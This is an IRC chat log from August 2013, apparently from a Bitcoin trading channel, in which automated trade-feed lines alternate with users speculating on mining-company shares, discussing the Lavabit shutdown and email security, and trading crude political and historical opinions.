22:28:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.03413 BTC [+] Aug 08 22:29:35 [BTCTC] [ASICMINER-PT] 1 @ 3.58 BTC [-] Aug 08 22:30:01 Any chance of getting 3.20 BTC ASICMINER shares today? Aug 08 22:31:45 yes Aug 08 22:32:17 Then why are there PUTs with 3.28 yield on btc-tc? Aug 08 22:32:46 I figure someone would have snapped them up if 3.2 was likely Aug 08 22:34:18 [HAVELOCK] [SMG] 10 @ 0.000237 = 0.0024 BTC [-] Aug 08 22:34:30 Any word from Yifu? Aug 08 22:34:32 [BTCTC] [BTCGARDEN] 28 @ 0.01561 = 0.4371 BTC [-] Aug 08 22:34:34 [BTCTC] [BTCGARDEN] 1174 @ 0.0156 = 18.3144 BTC [-] Aug 08 22:34:34 [HAVELOCK] [SMG] 15 @ 0.0002378 = 0.0036 BTC [+] Aug 08 22:35:10 If he announces chips are(/not) shipping now, how does each scenario play out on securities? Aug 08 22:35:58 [BTCTC] [LABCOIN] 20 @ 0.001544 = 0.0309 BTC [+] Aug 08 22:35:59 [BTCTC] [TAT.ASICMINER] 25 @ 0.03415 = 0.8538 BTC [+] Aug 08 22:36:38 up for those with chips on order Aug 08 22:36:48 down if not shipping? Aug 08 22:36:56 [BTCTC] [ASICMINER-PT] 1 @ 3.583 BTC [+] Aug 08 22:37:21 yeah i would think if he says no, then down we go Aug 08 22:37:23 so asicminer up if chips delayed further, actM up if chip delivering Aug 08 22:37:34 yep thats my thinking Aug 08 22:37:39 what about labcoin and btcgarden? Aug 08 22:38:00 probably down if shipping, up if not Aug 08 22:38:31 What if he announces a new initiative backed by venture capital? (everybody down?) Aug 08 22:38:31 i wouldnt say a huge downturn, but you'd see sell orders for sure Aug 08 22:38:36 lmao Aug 08 22:38:45 everything down the toilet Aug 08 22:39:03 I'm 90% liquid, so here's hoping Aug 08 22:39:13 [BTCTC] [TAT.ASICMINER] 16 @ 0.03476 = 0.5562 BTC [+] Aug 08 22:40:23 Namworld: shouldn't you pay for advertisement? Aug 08 22:40:24 [BTCTC] [ASICMINER-PT] 1 @ 3.583 BTC [+] Aug 08 22:41:48 Advertisements? They tend to be expensive. Aug 08 22:41:58 Forum ones? Aug 08 22:42:07 [BTCTC] [ASICMINER-PT] 1 @ 3.583 BTC [+] Aug 08 22:42:20 afrotec, Any chance "toilet scenario" would look like this? 0.0025 on ActM, 2.2 on ASICMINER, 0.008 on BTCGARDEN, and 0.0005 on Labcoin Aug 08 22:42:44 holy shhhh Aug 08 22:43:06 thats toilet for sure Aug 08 22:43:22 never gonna happen though lol Aug 08 22:43:32 2.2 on AM, people would go nuts Aug 08 22:43:36 and i would go to the bank Aug 08 22:43:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.03471 = 0.1736 BTC [-] Aug 08 22:43:55 Either way, I'm holding coin today looking for some toilet scenario bargains Aug 08 22:44:43 Well BTCGarden raised 32,000 BTC... for what? Having a very cheap and badly translated website promising the moon? Aug 08 22:44:57 For sure, that one is gonna tank Aug 08 22:45:09 yeah thats a tanker for ya Aug 08 22:45:23 and that gives rights to 20% of profits. Valuation: 160'000 BTC Aug 08 22:45:27 Even if they turned 75% of that into hashing power, they'd never be able to manage the power requirements Aug 08 22:46:00 That's over 10% of ASICMINER valuation Aug 08 22:46:02 [BTCTC] [NASTY-PT] 4 @ 0.004169 = 0.0167 BTC [+] Aug 08 22:46:21 and ASICMINER is valued at ~1'400'000 BTC which is high as heck. Aug 08 22:46:46 [BTCTC] [LABCOIN] 50 @ 0.001506 = 0.0753 BTC [-] Aug 08 22:46:48 [BTCTC] [LABCOIN] 185 @ 0.001505 = 0.2784 BTC [-] Aug 08 22:47:06 [BTCTC] [LABCOIN] 20 @ 0.001504 = 0.0301 BTC [-] Aug 08 22:47:17 [BTCTC] [LABCOIN] 50 @ 0.001504 = 0.0752 BTC [-] Aug 08 22:47:42 [BTCTC] [ACTIVEMINING] 43 @ 0.005759 = 0.2476 BTC [+] Aug 08 22:47:50 I think Labcon will peak at 0.00325 in Late November, then decay like a PMB as they fail to get a gen 2 chip in production Aug 08 22:48:07 What are the headlines today? Aug 08 22:48:26 Yifu, has some "news" incoming Aug 08 22:48:29 [BTCTC] [TAT.ASICMINER] 10 @ 0.03466 = 0.3466 BTC [-] Aug 08 22:48:31 [BTCTC] [TAT.ASICMINER] 2 @ 0.03467 = 0.0693 BTC [+] Aug 08 22:48:42 Yifu, news announcement: https://bitcointalk.org/index.php?topic=269950.0;topicseen Aug 08 22:48:45 well market is tanking, thats for sure http://dcx.smidge.com/ Aug 08 22:48:47 Exocyst where can I find more details? aww thank you :) Aug 08 22:48:53 [BTCTC] [TAT.ASICMINER] 48 @ 0.03466 = 1.6637 BTC [-] Aug 08 22:49:01 [HAVELOCK] [LABCO] 1 @ 0.00169 BTC [-] Aug 08 22:49:02 There's no info there Hiro2 Aug 08 22:49:08 oh Aug 08 22:49:09 lol Aug 08 22:49:10 just his announcement of an announcement Aug 08 22:49:10 little bit of self promotion there Aug 08 22:49:21 He tanked the market Aug 08 22:49:31 I sold last night when I read it Aug 08 22:49:50 I figure there is too much uncertainty in his pre-announcement announcement Aug 08 22:49:56 probably, then down for their competition. short term Aug 08 22:50:23 oopsie Aug 08 22:50:26 [BTCTC] [ASICMINER-PT] 4 @ 3.55 = 14.2 BTC [-] Aug 08 22:50:29 [BTCTC] [TAT.ASICMINER] 11 @ 0.03465 = 0.3812 BTC [-] Aug 08 22:51:18 what are the assumptions about his news? Aug 08 22:51:25 It would be nice to see end-user ASIC supply at the level ASICMINER has enjoyed Aug 08 22:51:54 1. Chips are shipping 2. Chips are delayed 3. New venture backed by VCs Aug 08 22:52:07 I'm not sure of other scenarios? Aug 08 22:52:23 4. Lost the avalon chip money in Vegas (sorry) Aug 08 22:53:00 so was the announcement properly announced then ? Aug 08 22:53:33 I'm not sure what the social strictures are on announcement announcements. Aug 08 22:53:54 [BTCTC] [BTCGARDEN] 4 @ 0.01561 = 0.0624 BTC [+] Aug 08 22:54:09 strictures eh ? Aug 08 22:54:24 restrictions or guiding doctrines Aug 08 22:54:33 hmm, keywords "just got off the plane" Aug 08 22:54:35 i know what it means. i just didn't expect teh webs to. Aug 08 22:54:46 when was the VC meeting held? that one that was speculated with Avalon? Aug 08 22:55:00 Hiro2 https://twitter.com/ScottWapnerCNBC/statuses/364370798892421120 thjat one ? Aug 08 22:55:28 [BTCTC] [NASTY-PT] 15 @ 0.004169 = 0.0625 BTC [+] Aug 08 22:55:30 thought we decided there was no 200mil Aug 08 22:55:46 afrotec it's just too lulzy to let die. Aug 08 22:55:49 mircea_popescu right but they can deny easily, maybe the deal is not finalized yet Aug 08 22:55:51 "o wow, 200mn!1111!!" Aug 08 22:56:02 Hiro2 trust me. there's denying and there's denying. Aug 08 22:56:48 [BTCTC] [LTC-ATF.B2] 2 @ 0.01044 = 0.0209 BTC [+] Aug 08 22:56:51 also "expect lots of news tomorrow" lots of news? Aug 08 22:57:05 Exocyst it doesn't sound like 1 or 2 Aug 08 22:57:06 lols of news. Aug 08 22:57:26 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 08 22:58:28 Should be a moving day, lot of coins have been pulled out of ASICMINER over the last week. Aug 08 22:58:42 he will probably say "2 weeks guys" Aug 08 22:59:01 [BTCTC] [ASICMINER-PT] 1 @ 3.479 BTC [-] Aug 08 22:59:03 2 weeks, the answer to all your ASIC shippping queries Aug 08 22:59:08 Exocyst why are people pulling out of ASICMINER? Aug 08 22:59:24 [BTCTC] [BTCGARDEN] 186 @ 0.0156 = 2.9016 BTC [-] Aug 08 22:59:29 Not sure Hiro2 Aug 08 22:59:36 diversification Aug 08 22:59:44 and exactly, even if he were to introduce something new his past performance is showing it could likely be delayed Aug 08 23:00:03 True, but people won't react rationally Aug 08 23:00:20 seems like the only thing I could be sure is that I got into btc investments at a really bad time, lol Aug 08 23:00:33 BTC markets are the height of irrationality Aug 08 23:00:56 Exocyst true.. like buying a bond higher than it's price worth Aug 08 23:01:32 There's BTC to be made, but this has been a crazy fortnight Aug 08 23:01:40 certainly Aug 08 23:02:10 Where is this avalon news, not the 200mil but the news of news... Aug 08 23:02:10 [HAVELOCK] [XBOND] 350 @ 0.001045 = 0.3658 BTC [-] Aug 08 23:02:23 [BTCTC] [LABCOIN] 20 @ 0.001478 = 0.0296 BTC [-] Aug 08 23:02:25 [BTCTC] [LABCOIN] 300 @ 0.00147 = 0.441 BTC [-] Aug 08 23:02:26 [BTCTC] [LABCOIN] 50 @ 0.001454 = 0.0727 BTC [-] Aug 08 23:02:27 [BTCTC] [LABCOIN] 1 @ 0.001436 BTC [-] Aug 08 23:02:28 [BTCTC] [LABCOIN] 10 @ 0.001435 = 0.0144 BTC [-] Aug 08 23:02:30 https://bitcointalk.org/index.php?topic=269950 Aug 08 23:02:30 [BTCTC] [LABCOIN] 187 @ 0.001411 = 0.2639 BTC [-] Aug 08 23:02:31 [BTCTC] [LABCOIN] 1500 @ 0.00141 = 2.115 BTC [-] Aug 08 23:02:31 shabang Aug 08 23:02:32 [BTCTC] [LABCOIN] 199 @ 0.001407 = 0.28 BTC [-] Aug 08 23:02:32 [BTCTC] [LABCOIN] 1597 @ 0.001406 = 2.2454 BTC [-] Aug 08 23:02:33 Exocyst how'd you know lot of coins have been pulled ? Aug 08 23:02:33 [BTCTC] [LABCOIN] 125 @ 0.001405 = 0.1756 BTC [-] Aug 08 23:02:34 [BTCTC] [LABCOIN] 20 @ 0.001404 = 0.0281 BTC [-] Aug 08 23:02:35 Incoming Avalon News 8/9/2013 Aug 08 23:02:35 [BTCTC] [LABCOIN] 1 @ 0.001404 BTC [-] Aug 08 23:02:36 [BTCTC] [LABCOIN] 980 @ 0.001404 = 1.3759 BTC [-] Aug 08 23:03:06 http://boingboing.net/2013/08/08/lavabit-email-service-snowden.html Aug 08 23:03:09 Lavabit, email service Snowden reportedly used, abruptly shuts down - Boing Boing Aug 08 23:03:19 yep just read that ThickAsThieves Aug 08 23:03:29 fuckin bullshit, all my tittypics just gone like that Aug 08 23:03:41 [BTCTC] [LABCOIN] 50 @ 0.001389 = 0.0695 BTC [-] Aug 08 23:03:42 [BTCTC] [LABCOIN] 235 @ 0.001388 = 0.3262 BTC [-] Aug 08 23:03:44 [BTCTC] [LABCOIN] 6 @ 0.001388 = 0.0083 BTC [-] Aug 08 23:03:44 just a guess mircea: http://dcx.smidge.com/ Aug 08 23:04:15 but theyre taking paypal donatinons Aug 08 23:04:18 weak shit Aug 08 23:04:44 [MPEX] [S.MG] 1 @ 0.00025 BTC [+] Aug 08 23:05:11 [BTCTC] [LABCOIN] 100 @ 0.001403 = 0.1403 BTC [+] Aug 08 23:05:12 [BTCTC] [LABCOIN] 25 @ 0.001403 = 0.0351 BTC [+] Aug 08 23:05:14 [BTCTC] [LABCOIN] 4 @ 0.001402 = 0.0056 BTC [-] Aug 08 23:05:15 [BTCTC] [LABCOIN] 10 @ 0.0014 = 0.014 BTC [-] Aug 08 23:05:16 [BTCTC] [LABCOIN] 12 @ 0.001391 = 0.0167 BTC [-] Aug 08 23:05:17 [BTCTC] [LABCOIN] 11 @ 0.001389 = 0.0153 BTC [-] Aug 08 23:05:17 [BTCTC] [LABCOIN] 89 @ 0.001388 = 0.1235 BTC [-] Aug 08 23:05:19 [BTCTC] [LABCOIN] 2 @ 0.001384 = 0.0028 BTC [-] Aug 08 23:05:20 [BTCTC] [LABCOIN] 20 @ 0.001383 = 0.0277 BTC [-] Aug 08 23:05:21 [BTCTC] [LABCOIN] 1 @ 0.001376 BTC [-] Aug 08 23:05:22 [BTCTC] [LABCOIN] 10 @ 0.001375 = 0.0138 BTC [-] Aug 08 23:05:23 [BTCTC] [LABCOIN] 520 @ 0.001361 = 0.7077 BTC [-] Aug 08 23:05:24 [BTCTC] [LABCOIN] 4160 @ 0.00136 = 5.6576 BTC [-] Aug 08 23:05:25 [BTCTC] [LABCOIN] 326 @ 0.00135 = 0.4401 BTC [-] Aug 08 23:05:26 [BTCTC] [LABCOIN] 2340 @ 0.001349 = 3.1567 BTC [-] Aug 08 23:05:30 [BTCTC] [LABCOIN] 10 @ 0.001349 = 0.0135 BTC [-] Aug 08 23:05:44 labcoin SCAM!!! Aug 08 23:05:56 lol you again Aug 08 23:06:16 i pmed that guy Aug 08 23:06:27 [BTCTC] [LABCOIN] 275 @ 0.001348 = 0.3707 BTC [-] Aug 08 23:06:28 [BTCTC] [LABCOIN] 6 @ 0.001343 = 0.0081 BTC [-] Aug 08 23:06:29 [BTCTC] [LABCOIN] 50 @ 0.001342 = 0.0671 BTC [-] Aug 08 23:06:30 [BTCTC] [LABCOIN] 15 @ 0.001326 = 0.0199 BTC [-] Aug 08 23:06:31 [BTCTC] [LABCOIN] 125 @ 0.001325 = 0.1656 BTC [-] Aug 08 23:06:33 [BTCTC] [LABCOIN] 2 @ 0.001307 = 0.0026 BTC [-] Aug 08 23:06:34 [BTCTC] [LABCOIN] 16 @ 0.001306 = 0.0209 BTC [-] Aug 08 23:06:49 did you now and what did mr dvd say Aug 08 23:06:53 LOL: http://imgur.com/a/H3tIr Aug 08 23:07:10 [HAVELOCK] [LABCO] 30 @ 0.00135382 = 0.0406 BTC [-] Aug 08 23:07:21 [HAVELOCK] [AM100] 1 @ 0.03599999 BTC [+] Aug 08 23:07:33 [HAVELOCK] [XBOND] 6 @ 0.001045 = 0.0063 BTC [-] Aug 08 23:08:25 [BTCTC] [LABCOIN] 10 @ 0.0013 = 0.013 BTC [-] Aug 08 23:08:36 ThickAsThieves good one Aug 08 23:08:38 Here's my problem Snape, you could of used your 90k shares, sold them bought at a low, resold at a high and repeat. You could of made your money back by now. Aug 08 23:08:43 [BTCTC] [LABCOIN] 20 @ 0.001268 = 0.0254 BTC [-] Aug 08 23:08:44 [BTCTC] [LABCOIN] 40 @ 0.001267 = 0.0507 BTC [-] Aug 08 23:08:45 [BTCTC] [LABCOIN] 625 @ 0.001266 = 0.7913 BTC [-] Aug 08 23:08:47 [BTCTC] [LABCOIN] 3652 @ 0.001265 = 4.6198 BTC [-] Aug 08 23:09:03 Rulother__ you know, trading a scam makes one a scammer. Aug 08 23:09:06 some people don't do that shit. Aug 08 23:09:22 I mean in terms of making your money back Aug 08 23:09:25 Rulother__: i could, but i didn't Aug 08 23:09:36 [BTCTC] [LABCOIN] 50 @ 0.001338 = 0.0669 BTC [+] Aug 08 23:09:37 [BTCTC] [LABCOIN] 235 @ 0.001339 = 0.3147 BTC [+] Aug 08 23:09:39 [BTCTC] [LABCOIN] 11 @ 0.00134 = 0.0147 BTC [+] Aug 08 23:09:40 [BTCTC] [LABCOIN] 9 @ 0.001345 = 0.0121 BTC [+] Aug 08 23:09:50 [BTCTC] [ACTIVEMINING] 10 @ 0.005502 = 0.055 BTC [-] Aug 08 23:09:51 [BTCTC] [ACTIVEMINING] 33 @ 0.005501 = 0.1815 BTC [-] Aug 08 23:09:56 ;;later tell asciilifeform http://boingboing.net/2013/08/08/lavabit-email-service-snowden.html Aug 08 23:09:57 The operation succeeded. Aug 08 23:10:09 [BTCTC] [ACTIVEMINING] 10 @ 0.005501 = 0.055 BTC [-] Aug 08 23:10:10 [BTCTC] [ACTIVEMINING] 91 @ 0.0055 = 0.5005 BTC [-] Aug 08 23:10:20 [BTCTC] [LABCOIN] 50 @ 0.001342 = 0.0671 BTC [-] Aug 08 23:10:21 [BTCTC] [LABCOIN] 235 @ 0.001343 = 0.3156 BTC [+] Aug 08 23:10:23 [BTCTC] [LABCOIN] 11 @ 0.001345 = 0.0148 BTC [+] Aug 08 23:10:30 [BTCTC] [LABCOIN] 7 @ 0.00127 = 0.0089 BTC [-] Aug 08 23:10:50 [BTCTC] [DMS.MINING] 50 @ 0.005 = 0.25 BTC [+] Aug 08 23:10:52 [BTCTC] [DMS.SELLING] 50 @ 0.0235 = 1.175 BTC [-] Aug 08 23:11:32 [BTCTC] [DMS.MINING] 18 @ 0.005 = 0.09 BTC [+] Aug 08 23:12:13 [BTCTC] [TAT.ASICMINER] 40 @ 0.03479 = 1.3916 BTC [+] Aug 08 23:12:39 [MPEX] [S.MPOE] 6800 @ 0.00083367 = 5.669 BTC [+] Aug 08 23:12:39 [MPEX] [S.MPOE] 1000 @ 0.00083566 = 0.8357 BTC [+] Aug 08 23:14:34 [HAVELOCK] [XBOND] 2000 @ 0.001045 = 2.09 BTC [-] Aug 08 23:14:57 [HAVELOCK] [XBOND] 644 @ 0.001045 = 0.673 BTC [-] Aug 08 23:16:01 [BTCTC] [DMS.PURCHASE] 50 @ 0.02822 = 1.411 BTC [-] Aug 08 23:17:22 [BTCTC] [DMS.MINING] 12 @ 0.005001 = 0.06 BTC [+] Aug 08 23:18:51 [BTCTC] [KENILWORTH] 2 @ 0.0018 = 0.0036 BTC [+] Aug 08 23:19:20 [HAVELOCK] [XBOND] 9 @ 0.001047 = 0.0094 BTC [+] Aug 08 23:19:38 [HAVELOCK] [AM100] 2 @ 0.03599998 = 0.072 BTC [-] Aug 08 23:23:16 mircea_popescu: why, asciilifeform is in the us? Aug 08 23:24:24 he just has a fetish for soviet us stuff. Aug 08 23:24:32 like some people are war buffs. Aug 08 23:31:28 [BTCTC] [LABCOIN] 50 @ 0.001392 = 0.0696 BTC [+] Aug 08 23:31:29 [BTCTC] [LABCOIN] 235 @ 0.001392 = 0.3271 BTC [+] Aug 08 23:32:42 [BTCTC] [LABCOIN] 2 @ 0.001391 = 0.0028 BTC [-] Aug 08 23:32:44 [BTCTC] [LABCOIN] 43 @ 0.001392 = 0.0599 BTC [+] Aug 08 23:32:45 way to go mr. s, tell the whole planet which lame web based email you used... Aug 08 23:34:25 [BTCTC] [DMS.MINING] 26 @ 0.005001 = 0.13 BTC [+] Aug 08 23:34:27 [BTCTC] [DMS.MINING] 82 @ 0.005 = 0.41 BTC [-] Aug 08 23:34:57 i don't get it tho. Aug 08 23:35:11 use gpg and gmail. what exactly is anyone going to do ? Aug 08 23:35:22 whyt do you need a "secure" mail service, what's it for ? Aug 08 23:35:47 mircea_popescu: cargo cult security isn't just for idiot bureaucrats Aug 08 23:35:55 it is also for script kiddies Aug 08 23:36:01 I use Google Auth on just about everything, but even that won't protect you from everything Aug 08 23:36:28 [HAVELOCK] [LABCO] 90 @ 0.00135 = 0.1215 BTC [-] Aug 08 23:36:39 if this weren't the case, the gestapo would have to send an actual physical gasenwagen to round them up Aug 08 23:36:43 Rulother__ there needs to be 2FA for Google Auth Aug 08 23:36:46 rather than just snarfing packets. Aug 08 23:37:30 [BTCTC] [LABCOIN] 3 @ 0.001396 = 0.0042 BTC [+] Aug 08 23:37:36 Rulother__ what exactly do you imagine google auth does ? Aug 08 23:38:52 [HAVELOCK] [VTX] 2 @ 0.505 = 1.01 BTC [-] Aug 08 23:38:53 [BTCTC] [DMS.MINING] 100 @ 0.0051 = 0.51 BTC [+] Aug 08 23:38:54 [BTCTC] [DMS.MINING] 29 @ 0.00515 = 0.1494 BTC [+] Aug 08 23:38:55 [HAVELOCK] [VTX] 5 @ 0.5097798 = 2.5489 BTC [+] Aug 08 23:38:58 [BTCTC] [DMS.MINING] 1 @ 0.005241 BTC [+] Aug 08 23:38:59 [HAVELOCK] [VTX] 5 @ 0.5097798 = 2.5489 BTC [+] Aug 08 23:39:01 [HAVELOCK] [VTX] 8 @ 0.50978 = 4.0782 BTC [+] Aug 08 23:39:08 [BTCTC] [DMS.MINING] 2 @ 0.004902 = 0.0098 BTC [-] Aug 08 23:39:09 [BTCTC] [DMS.MINING] 3 @ 0.0049 = 0.0147 BTC [-] Aug 08 23:39:11 see the now-famous 'TOR incident' as an obvious example. what does one need to have in place of a brain to rely on a winblows box for 'anonymous' naughties? Aug 08 23:39:11 [BTCTC] [DMS.MINING] 3 @ 0.0048 = 0.0144 BTC [-] Aug 08 23:42:01 "Bitcoin is already a centralized server since bitcoin software stores all history of transactions." Aug 08 23:42:12 from the ever loving font of goodness my blog comments are. Aug 08 23:43:25 Ok, http://bcoinnews.com/ Aug 08 23:43:38 [HAVELOCK] [AM100] 28 @ 0.03599998 = 1.008 BTC [-] Aug 08 23:43:41 [HAVELOCK] [XBOND] 634 @ 0.001044 = 0.6619 BTC [-] Aug 08 23:43:47 [7] verifies he is working with Labcoin Aug 08 23:43:50 [HAVELOCK] [SDSTM] 15 @ 0.0062912 = 0.0944 BTC [-] Aug 08 23:44:10 [HAVELOCK] [AM100] 15 @ 0.03599998 = 0.54 BTC [-] Aug 08 23:44:13 [HAVELOCK] [AM100] 5 @ 0.03599998 = 0.18 BTC [-] Aug 08 23:44:26 [HAVELOCK] [AM100] 3 @ 0.03599998 = 0.108 BTC [-] Aug 08 23:45:34 [HAVELOCK] [XBOND] 216 @ 0.001044 = 0.2255 BTC [-] Aug 08 23:45:42 [BTCTC] [MININGCO.ETF] 1 @ 1.89 BTC [+] Aug 08 23:45:55 ooh the seven Aug 08 23:46:05 the 'lavabit' affair is hilarious. just think of how the kgb (or any other 'golden age' secret police) would've handled it Aug 08 23:46:08 [BTCTC] [BITVPS] 1 @ 0.002095 BTC [+] Aug 08 23:46:09 so labcoin not so scam after all Aug 08 23:46:16 [BTCTC] [MININGCO.ETF] 1 @ 1.9 BTC [+] Aug 08 23:46:25 take mr. levison's wife, dog, cat, whatever, hold them hostage while he dutifully operates his honeypot Aug 08 23:46:27 [HAVELOCK] [VTX] 2 @ 0.50978 = 1.0196 BTC [+] Aug 08 23:46:30 [HAVELOCK] [AM100] 6 @ 0.03599998 = 0.216 BTC [-] Aug 08 23:46:35 [HAVELOCK] [VTX] 2 @ 0.5098 = 1.0196 BTC [+] Aug 08 23:46:41 but no, the wankers send him nasty letters instead. Aug 08 23:47:29 [BTCTC] [BITVPS] 1 @ 0.001901 BTC [-] Aug 08 23:49:08 asciilifeform indeed. not quite the same thing. Aug 08 23:49:46 mp, a bit of extra security really. Sorry was taking care of work here. Aug 08 23:50:00 Rulother__ okay, but the discussion is about google reading your emails. Aug 08 23:50:11 [BTCTC] [DMS.MINING] 19 @ 0.005199 = 0.0988 BTC [+] Aug 08 23:50:16 now, somewhere in the bureaucratic jungle there still live a few old-timers who wish they could grab people and wire them to the mains to get the truth, etc. this must be so, or the whole edifice would've collapsed already. Aug 08 23:50:21 Oh well yeah, they flat out say they do that. Sorry I must of missed that part. Aug 08 23:50:29 [BTCTC] [ASICMINER-PT] 30 @ 4.3 = 129 BTC [+] Aug 08 23:50:56 asciilifeform it is not so. Aug 08 23:51:13 mircea_popescu: elaborate Aug 08 23:51:30 the whole edifice survives so far because pretty much any american alive today is bereft any mettle. Aug 08 23:51:57 three day old putting balanced against very runny cheese. it'll sit forever as neither is piercing the other./ Aug 08 23:52:04 s/tt/dd Aug 08 23:52:38 also was no one awake in the '90s? used to be that it was generally understood that if you put plaintext over the wire, someone, somewhere will read it. if only a bored sysop. Aug 08 23:52:48 telnet ftw. Aug 08 23:52:54 [BTCTC] [DMS.MINING] 8 @ 0.004524 = 0.0362 BTC [-] Aug 08 23:52:56 [BTCTC] [DMS.MINING] 4 @ 0.004522 = 0.0181 BTC [-] Aug 08 23:52:57 [BTCTC] [DMS.MINING] 200 @ 0.00452 = 0.904 BTC [-] Aug 08 23:52:59 [BTCTC] [DMS.MINING] 2 @ 0.00452 = 0.009 BTC [-] Aug 08 23:53:00 [BTCTC] [DMS.MINING] 1 @ 0.004512 BTC [-] Aug 08 23:53:01 [BTCTC] [DMS.MINING] 10 @ 0.00452 = 0.0452 BTC [+] Aug 08 23:53:01 [BTCTC] [DMS.MINING] 276 @ 0.004511 = 1.245 BTC [-] Aug 08 23:53:02 [BTCTC] [DMS.MINING] 40 @ 0.00451 = 0.1804 BTC [-] Aug 08 23:53:03 [BTCTC] [DMS.MINING] 100 @ 0.004505 = 0.4505 BTC [-] Aug 08 23:53:05 [BTCTC] [DMS.MINING] 100 @ 0.004503 = 0.4503 BTC [-] Aug 08 23:53:06 [BTCTC] [DMS.MINING] 5 @ 0.00451 = 0.0226 BTC [+] Aug 08 23:53:07 [BTCTC] [DMS.MINING] 5 @ 0.004502 = 0.0225 BTC [-] Aug 08 23:53:08 [BTCTC] [DMS.MINING] 149 @ 0.0045 = 0.6705 BTC [-] Aug 08 23:53:33 [BTCTC] [DMS.MINING] 101 @ 0.0045 = 0.4545 BTC [-] Aug 08 23:54:31 [BTCTC] [LTC-ATF.B2] 149 @ 0.01042 = 1.5526 BTC [-] Aug 08 23:54:46 mircea_popescu: the edifice survives because the clever people over here are, by and large, well-fed. Aug 08 23:54:58 that is never a valid criterion. Aug 08 23:55:19 they are absent, not well fed. the clever people in the revolutionary army were well fed before going to valleyforge Aug 08 23:55:23 they went nevertheless. Aug 08 23:55:42 all the national french army officers, starting with bernadotte, were better fed before the empire than during. Aug 08 23:56:13 [BTCTC] [LABCOIN] 7 @ 0.001426 = 0.01 BTC [+] Aug 08 23:56:14 [BTCTC] [ACTIVEMINING] 10 @ 0.005351 = 0.0535 BTC [-] Aug 08 23:56:25 [BTCTC] [ACTIVEMINING] 25 @ 0.005351 = 0.1338 BTC [-] Aug 08 23:56:34 [BTCTC] [ACTIVEMINING] 6 @ 0.00535 = 0.0321 BTC [-] Aug 08 23:56:34 mircea_popescu: do you know of any time or place where a revolutionary army successfully formed from people who had to forsake air conditioning and 'x box' ? Aug 08 23:56:42 yup. Aug 08 23:56:48 every successful revolution ever. Aug 08 23:56:56 look at lenin. he was doing fine in switzerland. Aug 08 23:57:30 mircea_popescu: think of the gap between how the average fighting man lived in peacetime (lenin's cabin, etc) and the wartime conditions Aug 08 23:57:36 [BTCTC] [LABCOIN] 50 @ 0.001429 = 0.0715 BTC [+] Aug 08 23:57:46 quite a bit smaller then, vs. now Aug 08 23:57:54 the people who thumbed their nose at too much tea and crumpets in 1773 Aug 08 23:58:04 are the same people that were eating belts and maple bark in 1777 Aug 08 23:58:19 you have no idea. the gap has never been smaller than today. Aug 08 23:58:21 they didn't have 'homo sapiens lite' in 1777. or 1917. Aug 08 23:58:29 people who have never so much as swung a fist Aug 08 23:58:37 or been outdoors for more than a few hrs at a time Aug 08 23:58:40 [BTCTC] [ACTIVEMINING] 12 @ 0.00535 = 0.0642 BTC [-] Aug 08 23:58:49 [BTCTC] [TAT.ASICMINER] 4 @ 0.03466 = 0.1386 BTC [-] Aug 08 23:58:50 you are proposing a contradiction in terms. Aug 08 23:58:50 [BTCTC] [DMS.PURCHASE] 6 @ 0.02822 = 0.1693 BTC [-] Aug 08 23:58:51 [BTCTC] [TAT.ASICMINER] 46 @ 0.03467 = 1.5948 BTC [+] Aug 08 23:59:05 [BTCTC] [KENILWORTH] 10 @ 0.001659 = 0.0166 BTC [-] Aug 08 23:59:24 'human lite' won't fight. and if he did, the results would be comedic. Aug 08 23:59:27 [BTCTC] [LABCOIN] 25 @ 0.001427 = 0.0357 BTC [-] Aug 08 23:59:29 [BTCTC] [LABCOIN] 1 @ 0.001428 BTC [+] Aug 09 00:00:22 im kinda looking forward to it Aug 09 00:00:31 because i don't believe fighting will be avoided. Aug 09 00:00:33 [BTCTC] [ACTIVEMINING] 6 @ 0.00535 = 0.0321 BTC [-] Aug 09 00:00:34 [BTCTC] [ACTIVEMINING] 6 @ 0.00535 = 0.0321 BTC [-] Aug 09 00:00:41 [BTCTC] [LABCOIN] 1 @ 0.001429 BTC [+] Aug 09 00:01:08 mircea_popescu: there won't be 'fight' in the usual sense, more of a one-sided clobbering Aug 09 00:01:19 like the chechens coming out of the woodwork in post-collapse ussr. Aug 09 00:01:44 [BTCTC] [DMS.SELLING] 220 @ 0.02399 = 5.2778 BTC [+] Aug 09 00:01:51 [HAVELOCK] [SDSTM] 1 @ 0.0062912 BTC [-] Aug 09 00:02:05 the u.s. right now is sort of like a slice of meat sitting in a freezer. no flies, bacteria sit and wait, and so on Aug 09 00:02:15 turn the freezer off, you get the obvious result Aug 09 00:02:29 [BTCTC] [ACTIVEMINING] 2 @ 0.00535 = 0.0107 BTC [-] Aug 09 00:02:41 [BTCTC] [ACTIVEMINING] 10 @ 0.00535 = 0.0535 BTC [-] Aug 09 00:02:43 [BTCTC] [ACTIVEMINING] 52 @ 0.005351 = 0.2783 BTC [+] Aug 09 00:02:56 [BTCTC] [ACTIVEMINING] 10 @ 0.005351 = 0.0535 BTC [+] Aug 09 00:04:09 [BTCTC] [BTCGARDEN] 24 @ 0.01562 = 0.3749 BTC [+] Aug 09 00:04:39 [BTCTC] [DMS.SELLING] 80 @ 0.02399 = 1.9192 BTC [+] Aug 09 00:04:42 [BTCTC] [BTCGARDEN] 55 @ 0.0156 = 0.858 BTC [-] Aug 09 00:05:27 [BTCTC] [DMS.PURCHASE] 10 @ 0.02822 = 0.2822 BTC [-] Aug 09 00:05:52 [BTCTC] [DMS.SELLING] 160 @ 0.024 = 3.84 BTC [+] Aug 09 00:07:30 maybe. Aug 09 00:07:47 [BTCTC] [TAT.ASICMINER] 66 @ 0.0342 = 2.2572 BTC [-] Aug 09 00:07:48 what the fuck is wrong with laptops. i have four items here, they all use different power intakes Aug 09 00:07:59 15v5a, 19.5v 3.33a what thwe loving fuck Aug 09 00:08:14 just make a power jack and kill everyone marketing a laptop on a different scheme,. Aug 09 00:08:42 'market economics' ! Aug 09 00:08:47 [BTCTC] [DMS.SELLING] 3 @ 0.024 = 0.072 BTC [+] Aug 09 00:09:05 fuck that. if you listened to the assgholes every town in the us would have different power plugs in the walls. Aug 09 00:09:06 lose yer brick, go crying back to the vendor like a good consumer. Aug 09 00:09:07 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.002198 = 0.2198 BTC [-] Aug 09 00:09:30 mircea_popescu: if it hadn't been for the edison monopoly, this could have actually happened. Aug 09 00:09:30 i just cut the end and plugged it into a universal transformer. Aug 09 